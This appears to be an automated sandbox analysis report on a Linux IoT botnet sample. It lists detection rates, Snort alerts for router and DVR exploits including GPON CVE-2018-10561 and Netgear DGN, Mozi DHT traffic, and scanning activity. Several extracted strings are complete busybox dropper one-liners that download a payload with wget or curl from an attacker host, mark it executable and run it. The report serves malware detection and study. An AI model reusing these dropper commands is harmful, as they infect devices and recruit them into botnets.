Linux Analysis Report
ZFvtIZszMd

AV Detection

Source: ZFvtIZszMd	Virustotal: Detection: 66%			Perma Link
Source: ZFvtIZszMd	Metadefender: Detection: 48%			Perma Link
Source: ZFvtIZszMd	ReversingLabs: Detection: 60%

Spreading

Source: /tmp/ZFvtIZszMd (PID: 5260)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5260)	Opens: /proc/net/route			Jump to behavior

Source: ZFvtIZszMd	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.30.dr	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Networking

Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48916 -> 207.154.230.111:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:53338 -> 185.199.110.112:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:52454 -> 92.118.26.58:81
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.249.27:6776 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.213.248:51492 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 88.129.242.254:6231 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 201.150.176.65:4000 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 122.155.0.70:8083 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.93:58568 -> 192.168.2.23:15453
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:46296 -> 52.73.33.104:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46902 -> 192.186.22.190:5555
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.89.25:80 -> 192.168.2.23:48868
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49312 -> 50.16.188.25:8080
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:47290 -> 52.29.6.66:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.25.176.127:80 -> 192.168.2.23:32802
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.34.61:80 -> 192.168.2.23:39122
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:39122 -> 23.208.34.61:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:33740 -> 190.166.198.45:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:35218 -> 3.20.201.243:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.101.170.129:80 -> 192.168.2.23:48328
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:47072 -> 52.72.158.238:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58468 -> 24.8.179.115:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48184 -> 54.84.181.34:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.233.170:80 -> 192.168.2.23:60644
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49116 -> 149.104.79.70:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:38106 -> 2.178.219.63:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:60644 -> 23.208.233.170:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:45792 -> 52.4.18.169:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48328 -> 104.101.170.129:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48818 -> 64.34.159.178:80

Source: global traffic	TCP traffic: 25.187.113.148 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 173.124.45.94 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 9.115.138.146 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 176.13.132.57 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 93.125.7.219 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 210.67.192.146 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 74.40.185.41 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 209.59.13.236 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 185.229.210.149 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 88.80.204.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 53.170.157.130 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 43.159.190.154 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 214.222.104.45 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 193.151.195.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 17.252.58.84 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 84.231.13.28 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 130.173.40.235 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 150.228.174.178 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 38.56.136.31 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.72.254.135 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.235.119.78 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.22.194.11 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 157.219.143.152 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.10.107.49 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 4.141.143.218 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 116.15.105.36 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 158.20.189.8 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 106.99.159.31 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 164.182.234.67 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 123.220.165.29 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 40.4.221.62 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 207.237.147.66 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 19.104.90.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 93.179.249.7 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 57.34.192.239 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 146.118.139.85 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.228.159.201 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 193.2.18.134 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 40.250.29.252 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 63.68.28.146 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 180.80.137.123 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 199.253.175.69 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 220.163.161.225 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 142.203.21.215 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 204.46.18.242 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.52.69.37 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 196.212.110.237 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.64.50.131 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 204.222.113.90 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 79.158.209.144 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 30.183.116.123 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 199.240.101.94 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 208.220.131.137 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 156.79.252.244 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 135.15.153.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 198.245.112.146 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.5.17.154 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 207.23.195.29 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 130.245.77.217 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 54.181.148.41 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 42.217.20.173 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 163.125.119.193 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 50.183.64.105 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 15.101.151.43 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 164.113.140.76 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 186.104.158.59 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 218.136.34.104 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 69.235.123.21 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 180.24.184.106 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 106.207.31.42 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 176.107.239.103 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 16.191.137.51 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 145.40.158.93 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 148.234.153.158 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 190.36.150.101 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 187.123.230.15 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 52.68.173.169 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 164.97.186.164 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 62.124.228.151 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 168.170.73.87 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 194.105.25.217 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 144.181.144.68 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 216.128.208.88 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 132.25.8.225 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.174.228.124 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 70.48.69.248 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 85.12.92.30 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.55.189.249 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 37.201.208.112 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 177.52.181.55 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 173.181.211.215 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 92.47.126.52 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 69.130.148.70 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 165.144.62.218 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.14.154.237 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.238.205.88 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 33.104.165.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.82.230.159 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 108.102.15.248 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.248.31.222 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 141.39.142.235 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 149.209.199.38 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 136.135.67.3 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 214.223.72.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 104.219.63.182 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 98.1.76.193 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 189.97.112.66 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 154.3.70.165 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 66.144.204.153 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 30.105.245.140 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 9.31.180.218 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 202.86.252.99 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 9.3.250.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 131.143.33.147 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 1.186.104.107 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 159.53.131.234 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.74.21.50 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 168.240.219.165 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 51.187.225.124 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 25.215.228.98 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 80.165.24.201 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.182.89.143 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 73.87.35.147 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.59.30.234 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 72.173.127.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 44.87.62.109 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 86.84.186.192 ports 2,5,6,8,9,52869

Source: unknown	Network traffic detected: HTTP traffic on port 52454 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 52454
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37800 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 7574 -> 37800
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 46902 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
